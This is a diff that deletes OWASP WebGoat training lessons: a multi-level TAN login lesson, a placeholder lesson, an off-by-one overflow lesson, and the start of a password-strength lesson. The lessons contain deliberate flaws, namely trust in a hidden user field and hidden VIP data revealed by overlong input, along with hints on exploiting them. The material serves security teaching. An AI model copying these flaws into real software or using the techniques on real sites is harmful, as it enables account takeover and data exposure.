-        td3.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
-        tr2.addElement(td3);
-
-        table.addElement(tr1);
-        table.addElement(tr2);
-
-        ec.addElement(new Input(Input.HIDDEN, HIDDEN_USER, user));
-        loginDiv.addElement(table);
-        ec.addElement(loginDiv);
-        ec.addElement(createLogoutLink());
-
-    }
-
-    /**
-     * Create content if there is no tan left
-     * 
-     * @param ec
-     */
-    private void createNoTanLeftContent(ElementContainer ec)
-    {
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-        H1 h = new H1("<center>No tan is left! Please contact the admin. </center>");
-        ec.addElement(h);
-        ec.addElement(createLogoutLink());
-    }
-
-    private void createSuccessfulLoginContent(WebSession s, ElementContainer ec, String user)
-    {
-        updateTan(user, s);
-        String userDataStyle = "margin-top:50px;";
-
-        Div userDataDiv = new Div();
-        userDataDiv.setStyle(userDataStyle);
-        userDataDiv.addAttribute("align", "center");
-        Table table = new Table();
-        table.addAttribute("cellspacing", 10);
-        table.addAttribute("cellpadding", 5);
-
-        table.addAttribute("align", "center");
-        TR tr1 = new TR();
-        TR tr2 = new TR();
-        TR tr3 = new TR();
-        TR tr4 = new TR();
-        tr1.addElement(new TD("<b>Firstname:</b>"));
-        tr1.addElement(new TD(user));
-
-        try
-        {
-            ResultSet results = getUser(user, s);
-            if (results != null)
-            {
-                results.first();
-
-                tr2.addElement(new TD("<b>Lastname:</b>"));
-                tr2.addElement(new TD(results.getString("last_name")));
-
-                tr3.addElement(new TD("<b>Credit Card Type:</b>"));
-                tr3.addElement(new TD(results.getString("cc_type")));
-
-                tr4.addElement(new TD("<b>Credit Card Number:</b>"));
-                tr4.addElement(new TD(results.getString("cc_number")));
-
-                if (!user.equals(getLoggedInUser(s)))
-                {
-                    makeSuccess(s);
-                }
-            }
-
-        }
-
-        catch (Exception e)
-        {
-            e.printStackTrace();
-        }
-        table.addElement(tr1);
-        table.addElement(tr2);
-        table.addElement(tr3);
-        table.addElement(tr4);
-
-        userDataDiv.addElement(table);
-        ec.addElement(userDataDiv);
-        ec.addElement(createLogoutLink());
-    }
-
-    /**
-     * Create a link for logging out
-     * 
-     * @return Element
-     */
-    private Element createLogoutLink()
-    {
-        A logoutLink = new A();
-        logoutLink.addAttribute("href", getLink() + "&logout=true");
-        logoutLink.addElement("Logout");
-
-        String logoutStyle = "margin-right:50px; mrgin-top:30px";
-        Div logoutDiv = new Div();
-        logoutDiv.addAttribute("align", "right");
-        logoutDiv.addElement(logoutLink);
-        logoutDiv.setStyle(logoutStyle);
-
-        return logoutDiv;
-    }
-
-    /**
-     * Update the tan. Every tan should be used only once.
-     * 
-     * @param user
-     * @param s
-     */
-    private void updateTan(String user, WebSession s)
-    {
-        int tanNr = getTanPosition(user, s);
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "UPDATE user_data_tan SET login_count = ? WHERE first_name = ?";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setInt(1, tanNr);
-            prepStatement.setString(2, user);
-            prepStatement.execute();
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-
-    }
-
-    /**
-     * Get a user by its name
-     * 
-     * @param user
-     * @param s
-     * @return ResultSet containing the user
-     */
-    private ResultSet getUser(String user, WebSession s)
-    {
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "SELECT * FROM user_data_tan WHERE first_name = ? ";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setString(1, user);
-
-            ResultSet results = prepStatement.executeQuery();
-
-            return results;
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-        return null;
-
-    }
-
-    /**
-     * If lesson is reseted the tans should be resetted too
-     * 
-     * @param s
-     */
-    private void resetTans(WebSession s)
-    {
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "UPDATE user_data_tan SET login_count = 0 WHERE login_count > 0";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.execute();
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-
-    }
-
-    /**
-     * Get the count of the tan
-     * 
-     * @param user
-     * @param s
-     * @return tanPosition
-     */
-    private int getTanPosition(String user, WebSession s)
-    {
-        int tanNr = 0;
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "SELECT login_count FROM user_data_tan WHERE first_name = ?";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setString(1, user);
-            ResultSet results = prepStatement.executeQuery();
-
-            if ((results != null) && (results.first() == true))
-            {
-
-                tanNr = results.getInt(results.getRow());
-                tanNr = tanNr + 1;
-                if (tanNr > 5)
-                {
-                    tanNr = 0;
-                }
-            }
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-
-        return tanNr;
-    }
-
-    /**
-     * Get the tan for a user with specific position
-     * 
-     * @param user
-     * @param tanPosition
-     * @param s
-     * @return tan
-     */
-    private String getTan(String user, int tanPosition, WebSession s)
-    {
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "SELECT tan.tanValue FROM user_data_tan, tan WHERE user_data_tan.first_name = ? "
-                    + "AND user_data_tan.userid = tan.userid AND tan.tanNr = ?";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setString(1, user);
-            prepStatement.setInt(2, tanPosition);
-
-            ResultSet results = prepStatement.executeQuery();
-
-            if ((results != null) && (results.first() == true))
-            {
-                // System.out.println(results.getString("tanValue"));
-                return results.getString("tanValue");
-
-            }
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-        return "";
-
-    }
-
-    /**
-     * See if the tan is correct
-     * 
-     * @param tan
-     * @return true if the tan is correct
-     */
-    private boolean correctTan(String tan, WebSession s)
-    {
-        // if (!getCurrentTan(s).equals("")) { return tan.equals(String.valueOf(currentTan)); }
-        if (!getCurrentTan(s).equals("")) { return tan.equals(getCurrentTan(s)); }
-        return false;
-    }
-
-    /**
-     * See if the password and corresponding user is valid
-     * 
-     * @param userName
-     * @param password
-     * @param s
-     * @return true if the password was correct
-     */
-    private boolean correctLogin(String userName, String password, WebSession s)
-    {
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "SELECT * FROM user_data_tan WHERE first_name = ? AND password = ?";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setString(1, userName);
-            prepStatement.setString(2, password);
-
-            ResultSet results = prepStatement.executeQuery();
-
-            if ((results != null) && (results.first() == true)) {
-
-            return true;
-
-            }
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-
-        return false;
-
-    }
-
-    protected Category getDefaultCategory()
-    {
-        return Category.AUTHENTICATION;
-    }
-
-    /**
-     * Gets the hints attribute of the RoleBasedAccessControl object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-
-        hints.add("How does the server know which User has to be logged in");
-        hints.add("Maybe taking a look at the source code helps");
-        hints.add("Watch out for hidden fields");
-        hints.add("Manipulate the hidden field 'hidden_user'");
-
-        return hints;
-
-    }
-
-    public String getInstructions(WebSession s)
-    {
-        String instructions = "";
-
-        instructions = "You are an attacker called Joe. You have a valid account by webgoat financial. Your goal is to log in as "
-                + "Jane. Your username is <b>Joe</b> and your password is <b>banana</b>. This are your TANS: <br>"
-                + "Tan #1 = 15161<br>"
-                + "Tan #2 = 4894<br>"
-                + "Tan #3 = 18794<br>"
-                + "Tan #4 = 1564<br>"
-                + "Tan #5 = 45751<br>";
-
-        return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(110);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    public String getTitle()
-    {
-        return ("Multi Level Login 2");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement(""));
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/NewLesson.java

@@ -1,88 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.StringElement;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Sherif Koussa <a href="http://www.softwaresecured.com">Software Secured</a>
- * @created October 28, 2003
- */
-public class NewLesson extends LessonAdapter
-{
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        return super.createContent(s);
-        // makeSuccess(s);
-        // ec.addElement(new StringElement("Welcome to the WebGoat hall of fame !!"));
-        // return (ec);
-    }
-
-    /**
-     * Gets the category attribute of the NEW_LESSON object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.INTRODUCTION;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(85);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the DirectoryScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("How to create a Lesson");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by: Your name goes here!", new StringElement(""));
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/OffByOne.java

@@ -1,530 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.List;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.xhtml.br;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.ValidationException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Yiannis Pavlosoglou <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created December 05, 2009
- */
-public class OffByOne extends LessonAdapter
-{
-    private final static String[] price_plans = { "$1.99 - 1 hour ", "$5.99 - 12 hours", "$9.99 - 24 hours"};
-    
-    private final static String ROOM_NUMBER = "room_no";
-
-    private final static String FIRST_NAME = "first_name";
-    
-    private final static String LAST_NAME = "last_name";    
-    
-    private final static String PRICE_PLAN = "price_plan";
-    
-    private final static IMG LOGO = new IMG("images/logos/seleucus.png").setAlt("Seleucus Ltd")
-    .setBorder(0).setHspace(0).setVspace(0);
-    
-    /**
-     * <p>The main method for creating content, implemented
-     * from the the LessonAdapter class.</p>
-     * 
-     * <p>This particular "Off-by-One" lesson belonging in 
-     * the category of "Buffer Overflows" carries three 
-     * steps.</p>
-     * 
-     * @param s
-     *            WebSession
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            if(isFirstStep(s)) 
-            {
-                ec.addElement(makeFirstStep(s));
-            } 
-            else 
-            {
-                if (isSecondStep(s)) 
-                {
-                    ec.addElement(makeSecondStep(s));
-                } 
-                else 
-                {
-                    ec.addElement(makeThirdStep(s));
-                }
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-        
-        return (ec);
-    }
-
-    /**
-     * <p>Returns the Buffer Overflow category for this
-     * lesson.</p>
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-        return Category.BUFFER_OVERFLOW;
-    }
-
-    /**
-     * <p>Returns the hints as a List of Strings
-     * for this lesson.</p>
-     * 
-     * @return The hints values
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("While registering for Internet usage, see where else your details are used during the registration process.");
-        hints.add("See which fields during the registration process, allow for really long input to be submitted.");
-        hints.add("Check for hidden form fields during registration");
-        hints.add("Typically, web-based buffer overflows occur just above the value of 2 to the power of a number. E.g. 1024 + 1, 2048 + 1, 4096 + 1");
-        hints.add("Overflow the room number field with 4096+1 characters and look for hidden fields");
-        hints.add("Enter the VIP name in the first and last name fields");
-        return hints;
-    }
-
-    /**
-     * <p>Get the default ranking within the "Buffer
-     * Overflow" category.</p>
-     * 
-     * <p>Currently ranked to be the first lesson in
-     * this category.</p>
-     * 
-     * @return The value of 5 as an Integer Object
-     */
-    protected Integer getDefaultRanking()
-    {
-        return new Integer(5);
-    }
-
-    /**
-     * <p>Gets the title attribute for this lesson.</p> 
-     * 
-     * @return "Off-by-One Overflows"
-     */
-    public String getTitle()
-    {
-        return ("Off-by-One Overflows");
-    }
-
-    /**
-     * yada, yada...
-     */
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Yiannis Pavlosoglou ", LOGO);
-    }
-    
-    /**
-     * <p>Based on the parameters currently with values, this method
-     * returns true if we are in the first step of this lesson.</p>
-     * 
-     * @param s 
-     * @return true if we are in the first step of the lesson.
-     */
-    protected boolean isFirstStep(WebSession s) 
-    {
-        String room = s.getParser().getRawParameter(ROOM_NUMBER, "");
-        String name = s.getParser().getRawParameter(FIRST_NAME, "");
-        String last = s.getParser().getRawParameter(LAST_NAME, "");
-        
-        return (room.isEmpty() && name.isEmpty() && last.isEmpty() );
-    }
-    
-    /**
-     * <p>Based on the parameters currently with values, this method
-     * returns true if we are in the second step of this lesson.</p>
-     * 
-     * @param s
-     * @return true if we are in the second step of the lesson
-     */
-    protected boolean isSecondStep(WebSession s)
-    {
-        String price = s.getParser().getRawParameter(PRICE_PLAN, "");
-
-        return price.isEmpty();
-    }
-    
-    /**
-     * <p>Method for constructing the first step and returning it as
-     * an Element.</p>
-     * 
-     * @param s
-     * @return The Element that is the first step.
-     */
-    private Element makeFirstStep(WebSession s) 
-    {
-        ElementContainer ec = new ElementContainer();
-        String param = "";
-
-        // Header
-        ec.addElement(new StringElement("In order to access the Internet, you need to provide us the following information:"));
-        ec.addElement(new br());
-        ec.addElement(new br());
-        ec.addElement(new StringElement("Step 1/2"));
-        ec.addElement(new br());
-        ec.addElement(new br());
-        
-        ec.addElement(new StringElement("Ensure that your first and last names are entered exactly as they appear in the hotel's registration system."));
-        ec.addElement(new br());
-        ec.addElement(new br());
-
-        // Table 
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-        
-        // First Name
-        try {
-            param  = s.getParser().getStrictAlphaParameter(FIRST_NAME, 25);
-        } catch (ParameterNotFoundException e) {
-            param = "";
-        } catch (ValidationException e) {
-            param = "";
-        }
-        Input input = new Input(Input.TEXT, FIRST_NAME, param);
-
-        TR tr = new TR();
-        tr.addElement(new TD().addElement("First Name: "));
-        tr.addElement(new TD().addElement(input));
-        tr.addElement(new TD().addElement("*"));
-        t.addElement(tr);
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        t.addElement(tr);
-        
-        // Last Name
-        try {
-            param  = s.getParser().getStrictAlphaParameter(LAST_NAME, 25);
-        } catch (ParameterNotFoundException e) {
-            param = "";
-        } catch (ValidationException e) {
-            param = "";
-        }
-        input = new Input(Input.TEXT, LAST_NAME, param);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("Last Name: "));
-        tr.addElement(new TD().addElement(input));
-        tr.addElement(new TD().addElement("*"));
-        t.addElement(tr);
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        t.addElement(tr);
-        
-        // Room Number
-        try {
-            param  = s.getParser().getStrictAlphaParameter(ROOM_NUMBER, 25);
-        } catch (ParameterNotFoundException e) {
-            param = "";
-        } catch (ValidationException e) {
-            param = "";
-        }
-        input = new Input(Input.TEXT, ROOM_NUMBER, param);
-
-        tr = new TR();
-        tr.addElement(new TD().addElement("Room Number: "));
-        tr.addElement(new TD().addElement(input));
-        tr.addElement(new TD().addElement("*"));
-        t.addElement(tr);
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        t.addElement(tr);
-        
-        // Submit
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement(ECSFactory.makeButton("Submit")));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        t.addElement(tr);
-        
-        ec.addElement(t);
-        
-        // Footer
-        ec.addElement(new br());
-        ec.addElement(new br());
-        ec.addElement(new StringElement("* The above fields are required for login."));
-        ec.addElement(new br());
-        ec.addElement(new br());
-        
-        
-        return ec;
-    }
-    
-    /**
-     * <p>Method for constructing the second step and returning it as
-     * an Element.</p>
-     * 
-     * @param s
-     * @return The Element that is the second step.
-     */
-    private Element makeSecondStep(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        String param = "";
-
-        // Header
-        ec.addElement(new StringElement("Please select from the following available price plans:"));
-        ec.addElement(new br());
-        ec.addElement(new br());
-        ec.addElement(new StringElement("Step 2/2"));
-        ec.addElement(new br());
-        ec.addElement(new br());
-        
-        ec.addElement(new StringElement("Ensure that your selection matches the hours of usage, as no refunds are given for this service."));
-        ec.addElement(new br());
-        ec.addElement(new br());
-
-        // Table
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        
-        // First Empty Row
-        TR tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        t.addElement(tr);
-        
-        // Price Plans
-        tr = new TR();
-        tr.addElement(new TD().addElement("Available Price Plans:"));
-        tr.addElement(new TD().addElement(ECSFactory.makePulldown(PRICE_PLAN, price_plans, price_plans[2], 1)));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        t.addElement(tr);
-        
-        // Submit
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement(ECSFactory.makeButton("Accept Terms")));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        t.addElement(tr);
-        
-        ec.addElement(t);
-        ec.addElement("\r\n");
-
-        // Hidden Form Fields
-        param = s.getParser().getStringParameter(LAST_NAME, "");
-        Input input = new Input(Input.HIDDEN, LAST_NAME, param);
-        ec.addElement(input);
-        ec.addElement("\r\n");
-
-        param = s.getParser().getStringParameter(FIRST_NAME, "");
-        input = new Input(Input.HIDDEN, FIRST_NAME, param);
-        ec.addElement(input);
-        ec.addElement("\r\n");
-
-        param = s.getParser().getStringParameter(ROOM_NUMBER, "");
-        input = new Input(Input.HIDDEN, ROOM_NUMBER, param);
-        ec.addElement(input);
-        ec.addElement("\r\n");
-
-        
-        // Footer
-        ec.addElement(new br());
-        ec.addElement(new br());
-        ec.addElement(new StringElement("By Clicking on the above you accept the terms and conditions."));
-        ec.addElement(new br());
-        ec.addElement(new br());
-        
-        
-        return ec;
-    }
-    
-    /**
-     * <p>Method for constructing the third step and returning it as
-     * an Element.</p>
-     * 
-     * @param s
-     * @return The Element that is the third step.
-     */
-    private Element makeThirdStep(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        String param1 = "";
-        String param2 = "";
-        String param3 = "";
-
-        // Header
-        ec.addElement(new StringElement("You have now completed the 2 step process and have access to the Internet"));
-        ec.addElement(new br());
-        ec.addElement(new br());
-        ec.addElement(new StringElement("Process complete"));
-        ec.addElement(new br());
-        ec.addElement(new br());
-        
-        ec.addElement(new StringElement("Your connection will remain active for the time allocated for starting now."));
-        ec.addElement(new br());
-        ec.addElement(new br());
-
-        // Table
-        Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
-        if (s.isColor())
-        {
-            t.setBorder(1);
-        }
-
-        
-        // First Empty Row
-        TR tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        t.addElement(tr);
-        
-        // Price Plans
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        t.addElement(tr);
-        
-        // Submit
-        tr = new TR();
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        tr.addElement(new TD().addElement("&nbsp;"));
-        t.addElement(tr);
-        
-        ec.addElement(t);
-        ec.addElement("\r\n");
-
-        // Hidden Form Fields
-        param1 = s.getParser().getStringParameter(LAST_NAME, "");
-        Input input = new Input(Input.HIDDEN, "a", param1);
-        ec.addElement(input);
-        ec.addElement("\r\n");
-
-        param2 = s.getParser().getStringParameter(FIRST_NAME, "");
-        input = new Input(Input.HIDDEN, "b", param2);
-        ec.addElement(input);
-        ec.addElement("\r\n");
-
-        param3 = s.getParser().getStringParameter(ROOM_NUMBER, "");
-        input = new Input(Input.HIDDEN, "c", param3);
-        ec.addElement(input);
-        ec.addElement("\r\n");
-
-        // And finally the check...
-        if(param3.length() > 4096)
-        {
-            ec.addElement(new Input(Input.hidden, "d", "Johnathan"));
-            ec.addElement("\r\n");
-            ec.addElement(new Input(Input.hidden, "e", "Ravern"));
-            ec.addElement("\r\n");
-            ec.addElement(new Input(Input.hidden, "f", "4321"));
-            ec.addElement("\r\n");
-
-            ec.addElement(new Input(Input.hidden, "g", "John"));
-            ec.addElement("\r\n");
-            ec.addElement(new Input(Input.hidden, "h", "Smith"));
-            ec.addElement("\r\n");
-            ec.addElement(new Input(Input.hidden, "i", "56"));
-            ec.addElement("\r\n");
-
-            ec.addElement(new Input(Input.hidden, "j", "Ana"));
-            ec.addElement("\r\n");
-            ec.addElement(new Input(Input.hidden, "k", "Arneta"));
-            ec.addElement("\r\n");
-            ec.addElement(new Input(Input.hidden, "l", "78"));
-            ec.addElement("\r\n");
-            
-            ec.addElement(new Input(Input.hidden, "m", "Lewis"));
-            ec.addElement("\r\n");
-            ec.addElement(new Input(Input.hidden, "n", "Hamilton"));
-            ec.addElement("\r\n");
-            ec.addElement(new Input(Input.hidden, "o", "9901"));
-            ec.addElement("\r\n");
-
-            s.setMessage("To complete the lesson, restart lesson and enter VIP first/last name");
-
-        }
-        if (("Johnathan".equalsIgnoreCase(param2) || "John".equalsIgnoreCase(param2)
-                || "Ana".equalsIgnoreCase(param2) ||"Lewis".equalsIgnoreCase(param2))
-                && ("Ravern".equalsIgnoreCase(param1) || "Smith".equalsIgnoreCase(param1)
-                        || "Arneta".equalsIgnoreCase(param1) ||"Hamilton".equalsIgnoreCase(param1)))
-        {
-            // :)
-            // Allows for mixed VIP names, but that's not really the point
-            makeSuccess(s);
-        }
-        
-        // Footer
-        ec.addElement(new br());
-        ec.addElement(new br());
-        ec.addElement(new StringElement("We would like to thank you for your payment."));
-        ec.addElement(new br());
-        ec.addElement(new br());
-        
-        return ec;
-    }
-        
-
-}

src/main/java/org/owasp/webgoat/lessons/PasswordStrength.java

@@ -1,212 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList; 
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-import java.util.TreeMap;
-import java.util.Map.Entry;
-
-import org.apache.commons.collections.CollectionUtils;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.LI;
-import org.apache.ecs.html.OL;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Reto Lippuner, Marcel Wirth
- * @created April 7, 2008
- */
-
-public class PasswordStrength extends LessonAdapter
-{
-    private Map<String, Password> passwords = new TreeMap<String, Password>() {{
-        put("pass1", new Password("123456", "seconds", "0", "dictionary based, in top 10 most used passwords"));
-        put("pass2", new Password("abzfezd", "seconds", "2", "26 chars on 7 positions, 8 billion possible combinations"));
-        put("pass3", new Password("a9z1ezd", "seconds", "19", "26 + 10 chars on 7 positions = 78 billion possible combinations"));
-        put("pass4", new Password("aB8fEzDq", "hours", "15", "26 + 26 + 10 chars on 8 positions = 218 trillion possible combinations"));
-        put("pass5", new Password("z8!E?7D$", "days", "20", "96 chars on 8 positions = 66 quintillion possible combinations"));
-        put("pass6", new Password("My1stPassword!:Redd", "quintillion years", "364", "96 chars on 19 positions = 46 undecillion possible combinations"));
-    }};
-    
-    private class Password {
-        
-        String password;
-        String timeUnit;
-        String answer;
-        private String explanation;
-        
-        public Password(String password, String timeUnit, String answer, String explanation) {
-            this.password = password;
-            this.timeUnit = timeUnit;
-            this.answer = answer;
-            this.explanation = explanation;
-        }
-    }
-    
-    private boolean checkSolution(WebSession s) throws ParameterNotFoundException {
-        boolean allCorrect = true;
